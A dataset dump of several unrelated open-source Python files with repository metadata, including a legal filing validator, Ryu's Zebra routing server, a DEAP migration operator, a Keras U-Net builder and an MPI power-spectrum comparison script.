plt.semilogy(x, axis_ratio, "-r")
plt.grid(True)
plt.title("blue: f-values, green: sigma, red: axis ratio")
plt.figure()
plt.plot(x, best)
plt.grid(True)
plt.title("Object Variables")
plt.figure()
plt.semilogy(x, diagD)
plt.grid(True)
plt.title("Scaling (All Main Axes)")
plt.figure()
plt.semilogy(x, std)
plt.grid(True)
plt.title("Standard Deviations in All Coordinates")
plt.show()
| [
"[email protected]"
]
| |
46d714e2d63f7b3970e142a75ec299f3918e24ab | 849e95a72f4f380d6b31573a0a13e9eccd288838 | /legal-api/src/legal_api/services/filings/validations/conversion.py | d532b344ec36b6abb0179a0ec37385fccec37ac1 | [
"Apache-2.0"
]
| permissive | bcgov/lear | d9b27e2b44ba607ca13878357a62a0623d54ddee | d90f11a7b14411b02c07fe97d2c1fc31cd4a9b32 | refs/heads/main | 2023-09-01T11:26:11.058427 | 2023-08-31T20:25:24 | 2023-08-31T20:25:24 | 168,396,249 | 13 | 117 | Apache-2.0 | 2023-09-14T20:52:02 | 2019-01-30T18:49:09 | Python | UTF-8 | Python | false | false | 1,951 | py | # Copyright © 2022 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Validation for the Conversion filing."""
from http import HTTPStatus # pylint: disable=wrong-import-order
from typing import Dict, Optional
from flask_babel import _ as babel # noqa: N813, I004, I001, I003
from legal_api.errors import Error
from legal_api.models import Business
from legal_api.services.filings.validations.common_validations import validate_name_request
from legal_api.services.filings.validations.registration import validate_offices, validate_party
from ...utils import get_str
def validate(business: Business, filing: Dict) -> Optional[Error]:
"""Validate the Conversion filing."""
filing_type = 'conversion'
if not filing:
return Error(HTTPStatus.BAD_REQUEST, [{'error': babel('A valid filing is required.')}])
legal_type_path = '/filing/business/legalType'
legal_type = get_str(filing, legal_type_path)
if legal_type in [Business.LegalTypes.SOLE_PROP.value, Business.LegalTypes.PARTNERSHIP.value]:
msg = []
if filing.get('filing', {}).get('conversion', {}).get('nameRequest', None):
msg.extend(validate_name_request(filing, legal_type, filing_type))
msg.extend(validate_party(filing, legal_type, filing_type))
msg.extend(validate_offices(filing, filing_type))
if msg:
return Error(HTTPStatus.BAD_REQUEST, msg)
return None
| [
"[email protected]"
]
| |
1229ce4e6ef1de8ce673b6a08aec76352a73ec7f | 2d5171ac7f2640ed73b48aebf4b96e29d5cad818 | /AtcoderProblems/LevelB/147.py | 9b710ddb2985d2bdea5c4d8cb3a478461ada6650 | []
| no_license | kentahoriuchi/Atcorder | d7b8308424175f32d47f24bb15303695780e1611 | f6449d4e9dc7d92210497e3445515fe95b74c659 | refs/heads/master | 2023-06-06T09:26:46.963642 | 2021-06-13T15:08:04 | 2021-06-13T15:08:04 | 255,396,409 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 151 | py | N = int(input())
S = list(input())
if N%2 == 1:
print('No')
else:
if S[:N//2] == S[N//2:]:
print('Yes')
else:
print('No') | [
"[email protected]"
]
| |
a56c399efd1cab8fbdc97c65e235972bc8b8e467 | 6fcfb638fa725b6d21083ec54e3609fc1b287d9e | /python/osrg_ryu/ryu-master/ryu/services/protocols/zebra/server/zserver.py | f8119900253ae75bddf8f893620262895bc073fe | []
| no_license | LiuFang816/SALSTM_py_data | 6db258e51858aeff14af38898fef715b46980ac1 | d494b3041069d377d6a7a9c296a14334f2fa5acc | refs/heads/master | 2022-12-25T06:39:52.222097 | 2019-12-12T08:49:07 | 2019-12-12T08:49:07 | 227,546,525 | 10 | 7 | null | 2022-12-19T02:53:01 | 2019-12-12T07:29:39 | Python | UTF-8 | Python | false | false | 11,033 | py | # Copyright (C) 2017 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Zebra Server corresponding to 'zserv' structure.
"""
import contextlib
import logging
import os
import socket
import struct
import netaddr
from ryu import cfg
from ryu.base import app_manager
from ryu.base.app_manager import RyuApp
from ryu.controller.handler import set_ev_cls
from ryu.lib import hub
from ryu.lib.packet import zebra
from ryu.services.protocols.zebra import db
from ryu.services.protocols.zebra import event
from ryu.services.protocols.zebra.server import event as zserver_event
LOG = logging.getLogger(__name__)
CONF = cfg.CONF['zapi']
GLOBAL_CONF = cfg.CONF
# Session to database of Zebra protocol service
SESSION = db.Session()
class ZClient(object):
"""
Zebra client class.
"""
def __init__(self, server, sock, addr):
self.server = server
self.sock = sock
self.addr = addr
self.logger = server.logger
self.is_active = False
self._threads = []
self.send_q = hub.Queue(16)
# Zebra protocol version
self.zserv_ver = CONF.server_version
# Zebra route type distributed by client (not initialized yet)
self.route_type = None
def start(self):
self.is_active = True
self.sock.settimeout(GLOBAL_CONF.socket_timeout)
self._threads.append(hub.spawn(self._send_loop))
self._threads.append(hub.spawn(self._recv_loop))
self.server.send_event_to_observers(
zserver_event.EventZClientConnected(self))
hub.joinall(self._threads)
self.server.send_event_to_observers(
zserver_event.EventZClientDisconnected(self))
def stop(self):
self.is_active = False
def _send_loop(self):
try:
while self.is_active:
buf = self.send_q.get()
self.sock.sendall(buf)
except socket.error as e:
self.logger.exception(
'Error while sending message to Zebra client%s: %s',
self.addr, e)
self.stop()
def _recv_loop(self):
buf = b''
min_len = recv_len = zebra.ZebraMessage.get_header_size(
self.zserv_ver)
try:
while self.is_active:
try:
recv_buf = self.sock.recv(recv_len)
except socket.timeout:
continue
if len(recv_buf) == 0:
break
buf += recv_buf
while len(buf) >= min_len:
(length,) = struct.unpack_from('!H', buf)
if (length - len(buf)) > 0:
# Need to receive remaining data
recv_len = length - len(buf)
break
msg, _, buf = zebra.ZebraMessage.parser(buf)
ev = event.message_to_event(self, msg)
if ev:
self.logger.debug('Notify event: %s', ev)
self.server.send_event_to_observers(ev)
except socket.error as e:
self.logger.exception(
                'Error while receiving message from Zebra client%s: %s',
self.addr, e)
self.stop()
def send_msg(self, msg):
"""
Sends Zebra message.
:param msg: Instance of py:class: `ryu.lib.packet.zebra.ZebraMessage`.
:return: Serialized msg if succeeded, otherwise None.
"""
if not self.is_active:
self.logger.debug(
'Cannot send message: Already deactivated: msg=%s', msg)
return
elif not self.send_q:
self.logger.debug(
'Cannot send message: Send queue does not exist: msg=%s', msg)
return
elif self.zserv_ver != msg.version:
self.logger.debug(
'Zebra protocol version mismatch:'
'server_version=%d, msg.version=%d',
self.zserv_ver, msg.version)
msg.version = self.zserv_ver # fixup
self.send_q.put(msg.serialize())
def zclient_connection_factory(sock, addr):
LOG.debug('Connected from client: %s: %s', addr, sock)
zserv = app_manager.lookup_service_brick(ZServer.__name__)
with contextlib.closing(ZClient(zserv, sock, addr)) as zclient:
try:
zclient.start()
except Exception as e:
LOG.error('Error in client%s: %s', addr, e)
raise e
def detect_address_family(host):
if netaddr.valid_ipv4(host):
return socket.AF_INET
elif netaddr.valid_ipv6(host):
return socket.AF_INET6
elif os.path.isdir(os.path.dirname(host)):
return socket.AF_UNIX
else:
return None
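# e.g. detect_address_family('127.0.0.1')  -> socket.AF_INET
#      detect_address_family('::1')        -> socket.AF_INET6
#      detect_address_family('/var/run/zserv.api') -> socket.AF_UNIX
#      (the unix-socket example assumes the parent directory exists)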
class ZServer(RyuApp):
"""
The base class for Zebra server application.
"""
_EVENTS = event.ZEBRA_EVENTS + [
zserver_event.EventZClientConnected,
zserver_event.EventZClientDisconnected,
]
def __init__(self, *args, **kwargs):
super(ZServer, self).__init__(*args, **kwargs)
self.zserv = None
self.zserv_addr = (CONF.server_host, CONF.server_port)
self.zapi_connection_family = detect_address_family(CONF.server_host)
# Initial Router ID for Zebra server
self.router_id = CONF.router_id
def start(self):
super(ZServer, self).start()
if self.zapi_connection_family == socket.AF_UNIX:
unix_sock_dir = os.path.dirname(CONF.server_host)
# Makes sure the unix socket does not already exist
if os.path.exists(CONF.server_host):
os.remove(CONF.server_host)
if not os.path.isdir(unix_sock_dir):
os.mkdir(unix_sock_dir)
os.chmod(unix_sock_dir, 0o777)
try:
self.zserv = hub.StreamServer(
self.zserv_addr, zclient_connection_factory)
except OSError as e:
self.logger.error(
'Cannot start Zebra server%s: %s', self.zserv_addr, e)
raise e
if self.zapi_connection_family == socket.AF_UNIX:
os.chmod(CONF.server_host, 0o777)
self._add_lo_interface()
return hub.spawn(self.zserv.serve_forever)
def _add_lo_interface(self):
intf = db.interface.ip_link_add(SESSION, 'lo')
if intf:
self.logger.debug('Added interface "%s": %s', intf.ifname, intf)
route = db.route.ip_route_add(
SESSION,
destination='127.0.0.0/8',
device='lo',
source='127.0.0.1/8',
route_type=zebra.ZEBRA_ROUTE_CONNECT)
if route:
self.logger.debug(
'Added route to "%s": %s', route.destination, route)
@set_ev_cls(event.EventZebraHello)
def _hello_handler(self, ev):
if ev.body is None:
self.logger.debug('Client %s says hello.', ev.zclient)
return
# Set distributed route_type to ZClient
ev.zclient.route_type = ev.body.route_type
self.logger.debug(
'Client %s says hello and bids fair to announce only %s routes',
ev.zclient, ev.body.route_type)
@set_ev_cls(event.EventZebraRouterIDAdd)
def _router_id_add_handler(self, ev):
self.logger.debug(
'Client %s requests router_id, server will response: router_id=%s',
ev.zclient, self.router_id)
# Send ZEBRA_ROUTER_ID_UPDATE for response
msg = zebra.ZebraMessage(
body=zebra.ZebraRouterIDUpdate(
family=socket.AF_INET,
prefix='%s/32' % self.router_id))
ev.zclient.send_msg(msg)
@set_ev_cls(event.EventZebraInterfaceAdd)
def _interface_add_handler(self, ev):
self.logger.debug('Client %s requested all interfaces', ev.zclient)
interfaces = db.interface.ip_address_show_all(SESSION)
self.logger.debug('Server will response interfaces: %s', interfaces)
for intf in interfaces:
msg = zebra.ZebraMessage(
body=zebra.ZebraInterfaceAdd(
ifname=intf.ifname,
ifindex=intf.ifindex,
status=intf.status,
if_flags=intf.flags,
metric=intf.metric,
ifmtu=intf.ifmtu,
ifmtu6=intf.ifmtu6,
bandwidth=intf.bandwidth,
ll_type=intf.ll_type,
hw_addr=intf.hw_addr))
ev.zclient.send_msg(msg)
routes = db.route.ip_route_show_all(
SESSION, ifindex=intf.ifindex, is_selected=True)
self.logger.debug('Server will response routes: %s', routes)
for route in routes:
dest, _ = route.destination.split('/')
msg = zebra.ZebraMessage(
body=zebra.ZebraInterfaceAddressAdd(
ifindex=intf.ifindex,
ifc_flags=0,
family=None,
prefix=route.source,
dest=dest))
ev.zclient.send_msg(msg)
@set_ev_cls([event.EventZebraIPv4RouteAdd,
event.EventZebraIPv6RouteAdd])
def _ip_route_add_handler(self, ev):
self.logger.debug(
'Client %s advertised IP route: %s', ev.zclient, ev.body)
for nexthop in ev.body.nexthops:
route = db.route.ip_route_add(
SESSION,
destination=ev.body.prefix,
gateway=nexthop.addr,
ifindex=nexthop.ifindex or 0,
route_type=ev.body.route_type)
if route:
self.logger.debug(
'Added route to "%s": %s', route.destination, route)
@set_ev_cls([event.EventZebraIPv4RouteDelete,
event.EventZebraIPv6RouteDelete])
def _ip_route_delete_handler(self, ev):
self.logger.debug(
'Client %s withdrew IP route: %s', ev.zclient, ev.body)
for nexthop in ev.body.nexthops:
routes = db.route.ip_route_delete(
SESSION,
destination=ev.body.prefix,
gateway=nexthop.addr,
route_type=ev.body.route_type)
if routes:
self.logger.debug(
'Deleted routes to "%s": %s', ev.body.prefix, routes)
| [
"[email protected]"
]
| |
771f88b1dd03b5d6e62b5589304c1a9ea8911b90 | 0e1e643e864bcb96cf06f14f4cb559b034e114d0 | /Exps_7_v3/Basic_Pyramid_1ch_model_for_import_BN/pyr_1s/L3/step09_1side_L3.py | 58b490c9fdcdf4bd6b952ed9edb68970d1693d28 | []
| no_license | KongBOy/kong_model2 | 33a94a9d2be5b0f28f9d479b3744e1d0e0ebd307 | 1af20b168ffccf0d5293a393a40a9fa9519410b2 | refs/heads/master | 2022-10-14T03:09:22.543998 | 2022-10-06T11:33:42 | 2022-10-06T11:33:42 | 242,080,692 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,874 | py | #############################################################################################################################################################################################################
#############################################################################################################################################################################################################
### Add kong_model2 to sys.path
import os
code_exe_path = os.path.realpath(__file__) ### path of the currently executing step10_b.py
code_exe_path_element = code_exe_path.split("\\") ### split the path so we can find which level kong_model2 sits at
kong_layer = code_exe_path_element.index("kong_model2") ### find which level kong_model2 sits at
kong_model2_dir = "\\".join(code_exe_path_element[:kong_layer + 1]) ### locate the kong_model2 dir
import sys ### add kong_model2 to sys.path
sys.path.append(kong_model2_dir)
# print(__file__.split("\\")[-1])
# print(" code_exe_path:", code_exe_path)
# print(" code_exe_path_element:", code_exe_path_element)
# print(" kong_layer:", kong_layer)
# print(" kong_model2_dir:", kong_model2_dir)
#############################################################################################################################################################################################################
from step08_b_use_G_generate_I_to_M import I_to_M
from step08_b_use_G_generate_0_util import Tight_crop
from step09_c_train_step import Train_step_I_to_M
from step09_d_KModel_builder_combine_step789 import KModel_builder, MODEL_NAME
import time
start_time = time.time()
###############################################################################################################################################################################################
###############################################################################################################################################################################################
########################################################### Block1
### Block1
#########################################################################################
pyramid_1side_1 = [1, 0, 0, 0, 0, 0, 1]
pyramid_1side_2 = [1, 1, 0, 0, 0, 1, 1]
pyramid_1side_3 = [1, 1, 1, 0, 1, 1, 1]
pyramid_1side_4 = [1, 1, 1, 1, 1, 1, 1]
#########################################################################################
ch032_pyramid_1side_1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(norm="bn", out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch= 32, depth_level=3, out_ch=1, unet_acti="sigmoid", conv_block_num=pyramid_1side_1, ch_upper_bound= 2 ** 14)
ch032_pyramid_1side_2 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(norm="bn", out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch= 32, depth_level=3, out_ch=1, unet_acti="sigmoid", conv_block_num=pyramid_1side_2, ch_upper_bound= 2 ** 14)
ch032_pyramid_1side_3 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(norm="bn", out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch= 32, depth_level=3, out_ch=1, unet_acti="sigmoid", conv_block_num=pyramid_1side_3, ch_upper_bound= 2 ** 14)
ch032_pyramid_1side_4 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(norm="bn", out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch= 32, depth_level=3, out_ch=1, unet_acti="sigmoid", conv_block_num=pyramid_1side_4, ch_upper_bound= 2 ** 14)
#########################################################################################
###############################################################################################################################################################################################
if(__name__ == "__main__"):
import numpy as np
print("build_model cost time:", time.time() - start_time)
data = np.zeros(shape=(1, 511, 511, 1))
use_model = ch032_pyramid_1side_4
use_model = use_model.build()
result = use_model.generator(data)
print(result.shape)
import tensorflow as tf
import datetime
code_exe_dir = "\\".join(code_exe_path_element[:-1])
log_dir = f"{code_exe_dir}/use_Tensorboard_see_Graph/{datetime.datetime.now().strftime('%Y%m%d-%H%M%S')}"
tboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir)
img_inputs = tf.keras.Input(shape=(511, 511, 1))
use_model.generator(img_inputs)
use_model.generator.compile(optimizer='adam', loss='mae', metrics=['accuracy'])
use_model.generator.fit (data, data, epochs=1, callbacks=[tboard_callback])
print(f"tensorboard --logdir={log_dir}")
| [
"[email protected]"
]
| |
556b47ee9741e6478e72dc7ba357d7f7214ecc55 | f6de805e4e0e169cd82562aca20bfef3b38c8c31 | /apps/users/adminx.py | ed82ab401d80dc903fe1250af5de075c40fee0fa | []
| no_license | Huangkai1008/stuonline | 742ac9b27ea1cda8e2c35bf0425cb076ff0345dc | f874eeeb91433d7d789783347e4ffbb01198da58 | refs/heads/master | 2022-10-26T03:36:40.910069 | 2018-01-08T05:41:15 | 2018-01-08T05:41:29 | 114,594,601 | 0 | 1 | null | 2022-10-18T01:01:58 | 2017-12-18T04:05:32 | Python | UTF-8 | Python | false | false | 1,005 | py | # coding:utf8
import xadmin
from xadmin import views
from .models import EmailVerifyRecord, Banner
class BaseSetting(object):
"""
    Global xadmin configuration
"""
enable_themes = True
use_bootswatch = True
class GlobalSetting(object):
site_title = "Mooc后台管理系统"
site_footer = "mooc在线"
menu_style = "accordion"
class EmailVerifyRecordAdmin(object):
list_display = ['code', 'email', 'send_type', 'send_time']
search_fields = ['code', 'email', 'send_type']
list_filter = ['code', 'email', 'send_type', 'send_time']
class BannerAdmin(object):
list_display = ['title', 'image', 'url', 'index', 'add_time']
search_fields = ['title', 'image', 'url', 'index']
list_filter = ['title', 'image', 'url', 'index', 'add_time']
xadmin.site.register(EmailVerifyRecord, EmailVerifyRecordAdmin)
xadmin.site.register(Banner, BannerAdmin)
xadmin.site.register(views.BaseAdminView, BaseSetting)
xadmin.site.register(views.CommAdminView, GlobalSetting)
| [
"[email protected]"
]
| |
e40c6d6f5675fdbe0d83e5a15f777af2e4f5f6e6 | 13a32b92b1ba8ffb07e810dcc8ccdf1b8b1671ab | /home--tommy--mypy/mypy/lib/python2.7/site-packages/deap/tools/migration.py | c5c5a598b606788966662c951ee1599f7c6f8ab9 | [
"Unlicense"
]
| permissive | tommybutler/mlearnpy2 | 8ec52bcd03208c9771d8d02ede8eaa91a95bda30 | 9e5d377d0242ac5eb1e82a357e6701095a8ca1ff | refs/heads/master | 2022-10-24T23:30:18.705329 | 2022-10-17T15:41:37 | 2022-10-17T15:41:37 | 118,529,175 | 0 | 2 | Unlicense | 2022-10-15T23:32:18 | 2018-01-22T23:27:10 | Python | UTF-8 | Python | false | false | 2,764 | py | from __future__ import division
def migRing(populations, k, selection, replacement=None, migarray=None):
"""Perform a ring migration between the *populations*. The migration first
select *k* emigrants from each population using the specified *selection*
operator and then replace *k* individuals from the associated population
in the *migarray* by the emigrants. If no *replacement* operator is
specified, the immigrants will replace the emigrants of the population,
otherwise, the immigrants will replace the individuals selected by the
*replacement* operator. The migration array, if provided, shall contain
each population's index once and only once. If no migration array is
provided, it defaults to a serial ring migration (1 -- 2 -- ... -- n --
1). Selection and replacement function are called using the signature
``selection(populations[i], k)`` and ``replacement(populations[i], k)``.
It is important to note that the replacement strategy must select *k*
**different** individuals. For example, using a traditional tournament for
replacement strategy will thus give undesirable effects, two individuals
will most likely try to enter the same slot.
:param populations: A list of (sub-)populations on which to operate
migration.
:param k: The number of individuals to migrate.
:param selection: The function to use for selection.
:param replacement: The function to use to select which individuals will
be replaced. If :obj:`None` (default) the individuals
that leave the population are directly replaced.
:param migarray: A list of indices indicating where the individuals from
a particular position in the list goes. This defaults
to a ring migration.
"""
nbr_demes = len(populations)
if migarray is None:
migarray = range(1, nbr_demes) + [0]
immigrants = [[] for i in xrange(nbr_demes)]
emigrants = [[] for i in xrange(nbr_demes)]
for from_deme in xrange(nbr_demes):
emigrants[from_deme].extend(selection(populations[from_deme], k))
if replacement is None:
# If no replacement strategy is selected, replace those who migrate
immigrants[from_deme] = emigrants[from_deme]
else:
# Else select those who will be replaced
immigrants[from_deme].extend(replacement(populations[from_deme], k))
for from_deme, to_deme in enumerate(migarray):
for i, immigrant in enumerate(immigrants[to_deme]):
indx = populations[to_deme].index(immigrant)
populations[to_deme][indx] = emigrants[from_deme][i]
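# Minimal usage sketch (illustration only, not part of deap): three demes of
# plain numbers, where `selection` picks the k largest, so each deme's maximum
# travels one step around the default ring 0 -> 1 -> 2 -> 0:
#
#     demes = [[1, 5, 3], [9, 2, 4], [7, 8, 6]]
#     migRing(demes, k=1, selection=lambda pop, k: sorted(pop)[-k:])
#     # demes is now [[1, 8, 3], [5, 2, 4], [7, 9, 6]]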
__all__ = ['migRing']
| [
"[email protected]"
]
| |
8a9780c347a8c98f84d292c41a1fb0567cb89ea7 | 607241e619ca499121106b218a5e00ac5244bda3 | /analysis/plot_power_spectrum_ch_hydro_MPI_enzo.py | 047f5abbf4b31835cfaf40243969c97d0465bc6b | []
| no_license | bvillasen/cosmo_sims | 37caea950c7be0626a5170333bfe734071c58124 | 8b20dc05842a22ea50ceb3d646037d2e66fc8c9b | refs/heads/master | 2020-04-22T23:22:28.670894 | 2020-01-02T23:32:39 | 2020-01-02T23:32:39 | 114,167,239 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,135 | py | import sys
import numpy as np
import matplotlib.pyplot as plt
import h5py as h5
from power_spectrum import get_power_spectrum
dev_dir = '/home/bruno/Desktop/Dropbox/Developer/'
cosmo_dir = dev_dir + 'cosmo_sims/'
toolsDirectory = cosmo_dir + "tools/"
sys.path.extend([toolsDirectory ] )
from load_data_cholla import load_snapshot_data
from load_data_enzo import load_snapshot_enzo
from mpi4py import MPI
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
# dataDir = '/home/bruno/Desktop/data/'
dataDir = '/raid/bruno/data/'
outputsDir = '/home/bruno/cholla/scale_output_files/'
eta = 0.030
beta = 0.25
nPoints = 256
Lbox = 50.0 #Mpc/h
data_name = 'SIMPLE_PPMP_eta0.035_beta0.00_grav4_clean'
# dataSet = 'PLMP'
enzoDir = dataDir + 'cosmo_sims/enzo/{0}_hydro_50Mpc_HLLC_grav4/h5_files/'.format(nPoints )
# chollaDir = dataDir + 'cosmo_sims/cholla_pm/{1}_hydro_50Mpc/data_enzo_{2}_eta{0:.3f}/'.format( eta, nPoints, reconst )
chollaDir = dataDir + 'cosmo_sims/cholla_pm/{1}_hydro_50Mpc/data_{0}/'.format( data_name, nPoints, )
outDir = dev_dir + 'figures/power_hydro/'
# fileName = outDir + 'ps_{0}_hydro_enzo_{2}_eta{1:.3f}.png'.format( nPoints, eta, reconst )
# set simulation volume dimentions
nz, ny, nx = nPoints, nPoints, nPoints
nCells = nx*ny*nz
h = 0.6766
Lx = Lbox
Ly = Lbox
Lz = Lbox
dx, dy, dz = Lx/(nx), Ly/(ny), Lz/(nz )
n_kSamples = 12
redshift_list = [ 100, 70, 40, 10, 7, 4, 1, 0.6, 0.3, 0 ]
redshift_list.reverse()
outputs_enzo = np.loadtxt( outputsDir + 'outputs_hydro_enzo_256_50Mpc_HLLC_grav4.txt')
z_enzo = 1./(outputs_enzo) - 1
snapshots_enzo = []
for z in redshift_list:
z_diff_enzo = np.abs( z_enzo - z )
index_enzo = np.where( z_diff_enzo == z_diff_enzo.min())[0][0]
snapshots_enzo.append( index_enzo )
snapshots = snapshots_enzo
# #For 128 50Mpc
# # snapshots = [ 0, 2, 4, 7, 10, 13, 16, 22, 24, 27]
#
# # snapshots = [ 0, 2, 4, 7, 10, 13, 16, 20, 25, 30]
#
# # snapshots = [ 0, 2, 4, 7, 10, 13, 16, 20, 24, 38]
# # snapshots = [ 0, 2, 4, 7, 10, 13, 16, 19]
# # snapshots = [ 0, 2, 4]
# n_snapshots = len( snapshots )
n_snapshots = len(snapshots)
if rank >= n_snapshots: exit()
nSnap = snapshots[rank]
n_power_data = 4
ps_all = np.ones( [n_power_data, n_kSamples] )
# ps_all *= rank
print " Cholla: ", nSnap
snapKey = str( nSnap )
# if i not in [9]: continue
data_cholla = load_snapshot_data( snapKey, chollaDir, cool=False, single_file=False )
current_z_ch = data_cholla['current_z']
dens_dm_cholla = data_cholla['dm']['density'][...]
dens_gas_cholla = data_cholla['gas']['density'][...]
ps_dm_cholla, k_vals, count_dm_cholla = get_power_spectrum( dens_dm_cholla, Lbox, nx, ny, nz, dx, dy, dz, n_kSamples=n_kSamples)
ps_gas_cholla, k_vals, count_gas_cholla = get_power_spectrum( dens_gas_cholla, Lbox, nx, ny, nz, dx, dy, dz, n_kSamples=n_kSamples)
ps_all[0] = ps_dm_cholla
ps_all[1] = ps_gas_cholla
print ' Enzo: ', nSnap
data_enzo = load_snapshot_enzo( nSnap, enzoDir, dm=True, cool=False)
current_a_enzo = data_enzo['current_a']
current_z_enzo = data_enzo['current_z']
dens_dm_enzo = data_enzo['dm']['density'][...]
dens_gas_enzo = data_enzo['gas']['density'][...]
ps_dm_enzo, k_vals, count_dm_enzo = get_power_spectrum( dens_dm_enzo, Lbox, nx, ny, nz, dx, dy, dz, n_kSamples=n_kSamples)
ps_gas_enzo, k_vals, count_gas_enzo = get_power_spectrum( dens_gas_enzo, Lbox, nx, ny, nz, dx, dy, dz, n_kSamples=n_kSamples)
ps_all[2] = ps_dm_enzo
ps_all[3] = ps_gas_enzo
send_buf = ps_all
recv_buf = None
if rank == 0:
    recv_buf = np.empty([n_snapshots, n_power_data, n_kSamples], dtype=np.float64)
comm.Gather(send_buf, recv_buf, root=0)
data_all = recv_buf
send_buf = np.array([current_z_ch])
recv_buf = None
if rank == 0:
    recv_buf = np.empty([n_snapshots], dtype=np.float64)
comm.Gather(send_buf, recv_buf, root=0)
current_z_all = recv_buf
if rank != 0: exit()
# print data_all
# print current_z_all
fig = plt.figure(0)
fig.set_size_inches(20,10)
fig.clf()
gs = plt.GridSpec(5, 2)
gs.update(hspace=0.05, wspace=0.08, )
ax1 = plt.subplot(gs[0:4, 0])
ax2 = plt.subplot(gs[4:5, 0])
ax3 = plt.subplot(gs[0:4, 1])
ax4 = plt.subplot(gs[4:5, 1])
# colors = ['b', 'y', 'g', 'c', 'm', 'b', 'y', 'g', 'c', 'm', ]
colors = ['C0', 'C1', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9']
for i in range(n_snapshots):
ps_dm_cholla = data_all[i,0]
ps_gas_cholla = data_all[i,1]
ps_dm_enzo = data_all[i,2]
ps_gas_enzo = data_all[i,3]
label = 'z = {0:.1f}'.format(current_z_all[i])
c = colors[i]
if i == 0:
ax1.plot( k_vals, ps_dm_enzo, '--', c=c, linewidth=1, label='Enzo' )
ax3.plot( k_vals, ps_gas_enzo, '--', c=c, linewidth=1, label='Enzo' )
else:
ax1.plot( k_vals, ps_dm_enzo, '--', c=c, linewidth=1 )
ax3.plot( k_vals, ps_gas_enzo, '--', c=c, linewidth=1 )
#
ax1.plot( k_vals, ps_dm_cholla, c=c, linewidth=2, label=label )
ax3.plot( k_vals, ps_gas_cholla, c=c, linewidth=2, label=label )
error_dm = (ps_dm_cholla - ps_dm_enzo) / ps_dm_enzo
error_gas = (ps_gas_cholla - ps_gas_enzo) / ps_gas_enzo
ax2.plot( k_vals, error_dm , c=c, alpha=0.9)
ax4.plot( k_vals, error_gas , c=c, alpha=0.9)
ax2.axhline( y=0., color='r', linestyle='--', )
ax2.set_ylim( -1, 1)
ax4.axhline( y=0., color='r', linestyle='--', )
ax4.set_ylim( -1, 1)
ax1.set_ylabel( r'$P(k) $', fontsize=17)
ax2.set_ylabel( 'Difference', fontsize=15)
ax1.legend( loc=3)
ax2.set_xlabel( r'$k \, \, [h Mpc^{-1}]$', fontsize=17)
ax3.legend( loc=3)
ax2.set_xlabel( r'$k \, \, [h Mpc^{-1}]$', fontsize=17)
ax4.set_xlabel( r'$k \, \, [h Mpc^{-1}]$', fontsize=17)
ax1.set_xscale('log')
ax1.set_yscale('log')
ax3.set_xscale('log')
ax3.set_yscale('log')
ax2.set_xscale('log')
ax4.set_xscale('log')
ax1.set_title('DM Power Spectrum', fontsize=18)
ax3.set_title('Gas Power Spectrum ', fontsize=18)
data_name = 'SIMPLE_PPMP_eta0.005_beta0.00_grav4'  # overrides the eta0.035 name used for chollaDir above; only the title and output filename use this value
fig.suptitle(r' {0} '.format(data_name), fontsize=20, y=0.95)
fileName = outDir + 'ps_{0}_hydro_enzo_{1}.png'.format( nPoints, data_name )
# ax1.xlim()
fig.savefig( fileName, pad_inches=0.1, bbox_inches='tight', dpi=80)
print 'Saved Image: ', fileName
| [
"[email protected]"
]
| |
ae3fc09f862ea7e2d30971709cad0a4ea02cc83f | e84a9b9bf1398f0e78a63ea3c5d50a5263165301 | /ridge.py | 07f327e9bd03ad145265355c94531c53c7a508ba | []
| no_license | theovincent/SAG_vs_SDCA | 6289f8ae90c8db5bc734cc76b362c7d329bd8d06 | 827614d3ef6bbd2355a53ff745879a887e23d5d8 | refs/heads/master | 2022-06-26T10:15:19.746976 | 2020-05-10T12:43:34 | 2020-05-10T12:43:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,355 | py | from pathlib import Path
import numpy as np
import matplotlib.pyplot as plt
# For the data
from src.utils.preprocess import get_houses_data
# For sag method
from src.sag.train_sag import sag_train
from src.sag.test_sag import sag_test
import src.sag.loss.squared_loss as square_sag
from src.sag.accuracy.regression_acc import regression_acc as acc_sag
from src.sag.visualisation.regression_visu import regression_visu as visu_sag
# For sdca method
from src.sdca.train_sdca import sdca_train
from src.sdca.test_sdca import sdca_test
from src.sdca.kernel.polynomial import polynomial_kernel
from src.sdca.kernel.gaussian import gaussian_kernel
from src.sdca.loss.square_loss import square_loss as square_sdca
from src.sdca.steps.square_step import square_step as step_sdca
from src.sdca.accuracy.regression_acc import regression_acc as acc_sdca
from src.sdca.visualisation.sdca_visu import sdca_visu
YOU_WANT_SAG = False
YOU_WANT_SDCA = True
# -- Set the options --
ADD_BIAS = True
POLY_KERNEL = False
# --- Get the data ---
CSV_PATH = Path("data/data.csv")
